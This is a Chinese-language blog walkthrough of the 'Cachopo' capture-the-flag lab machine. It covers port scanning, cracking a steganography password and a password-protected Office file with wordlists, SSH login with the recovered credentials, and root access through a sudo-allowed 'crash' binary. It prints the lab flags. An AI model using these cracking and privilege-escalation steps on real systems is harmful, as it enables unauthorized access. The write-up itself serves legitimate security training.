Pepster'Blog
TheHackersLabs-Cachopo靶机详解WP
城南花已开 Lv5
  2025-01-02 19:08:15   2025-01-22 19:49:12    1.4k 字  7 分钟  

信息收集

服务探测

开放80端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.131  08:00:27:ff:d8:91       (Unknown)
192.168.60.254  00:50:56:fd:82:05       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.937 seconds (132.16 hosts/sec). 4 responded
❯ ip=192.168.60.131
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.131:22
Open 192.168.60.131:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 19:09 CST
Initiating ARP Ping Scan at 19:09
Scanning 192.168.60.131 [1 port]
Completed ARP Ping Scan at 19:09, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:09
Completed Parallel DNS resolution of 1 host. at 19:09, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:09
Scanning 192.168.60.131 [2 ports]
Discovered open port 22/tcp on 192.168.60.131
Discovered open port 80/tcp on 192.168.60.131
Completed SYN Stealth Scan at 19:09, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.131
Host is up, received arp-response (0.00060s latency).
Scanned at 2025-01-02 19:09:05 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:FF:D8:91 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

在hosts添加一个域名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
sudo vim /etc/hosts
❯ whatweb cachopo.thl
http://cachopo.thl [200 OK] Apache[2.4.61], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.61 (Debian)], IP[192.168.60.131], Title[Cachopo]
❯ curl cachopo.thl
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cachopo</title>
    <style>
        body, html {
            margin: 0;
            padding: 0;
            height: 100%;
            width: 100%;
            overflow: hidden; /* Evita que se muestren barras de desplazamiento */
        }
        .full-screen-image {
            background-image: url('cachopo.jpg');
            background-size: cover;
            background-position: center;
            background-repeat: no-repeat;
            height: 100%;
            width: 100%;
            position: absolute;
        }
    </style>
</head>
<body>
    <div class="full-screen-image"></div>
</body>
</html>

发现首页除了一张图片,其他什么也没有

image

我尝试扫描了一些目录也没有什么收获

图片隐写

我将图片wget了一下

猜测存在图片隐写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
❯ wget http://cachopo.thl/cachopo.jpg
--2025-01-02 19:18:23--  http://cachopo.thl/cachopo.jpg
Resolving cachopo.thl (cachopo.thl)... 192.168.60.131
Connecting to cachopo.thl (cachopo.thl)|192.168.60.131|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 441718 (431K) [image/jpeg]
Saving to: ‘cachopo.jpg’

cachopo.jpg                           100%[=======================================================================>] 431.37K  --.-KB/s    in 0.01s

2025-01-02 19:18:23 (32.4 MB/s) - ‘cachopo.jpg’ saved [441718/441718]
mv cachopo.jpg image.jpg
❯ stegcracker image.jpg
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2025 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

No wordlist was specified, using default rockyou.txt wordlist.
Counting lines in wordlist..
Attacking file 'image.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: doggies
Tried 4428 passwords
Your file has been written to: image.jpg.out
cat image.jpg.out
el directorio es mycachopo
目录是mycachopo

给了一个提示,访问mycachopo目录,有个文件

image

down下来发现是个已加密的CDFV2文件

爆破一下,得到密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ office2john Cocineros >hash
❯ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2007 for all loaded hashes
Cost 2 (iteration count) is 50000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 14 candidates buffered for the current salt, minimum 32 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
horse1           (Cocineros)
1g 0:00:00:02 DONE 2/3 (2025-01-02 19:33) 0.4048g/s 4969p/s 4969c/s 4969C/s helene1..jamesbond1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

我尝试利用windows中的word输入密码无法打开

image

在Kali中安装LibreOffice可以打开

image

Hydra爆破

得到的貌似是三个用户名Sofia Carlos Luis

我尝试利用用户名爆破一下

爆了老半天,出不来

后面看了其他师傅的WP原来用户名全是小写的

我直接拿密码连接了

image

用户提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ ssh [email protected]
The authenticity of host '192.168.60.131 (192.168.60.131)' can't be established.
ED25519 key fingerprint is SHA256:TwxUt/2Cw+RBXmkw35lCwjyjcXY9BpomAJBscsWYUC4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.131' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux Cachopo 6.1.0-22-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.94-1 (2024-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jul 15 11:44:31 2024 from 192.168.1.41
carlos@Cachopo:~$ ls
user.txt
carlos@Cachopo:~$ cat user.txt
df24ed3c0e0c0ffa94ff3f5bd4b577d7

Root提权

发现有sudo权限

利用一下

1
2
3
4
5
carlos@Cachopo:~$ sudo /usr/bin/crash -h
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
a642074bfe5c59de6f1bc072e54478dc
  1. 信息收集
    1. 服务探测
    2. 图片隐写
    3. Hydra爆破
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k
  1. 信息收集
    1. 服务探测
    2. 图片隐写
    3. Hydra爆破
  2. 用户提权
  3. Root提权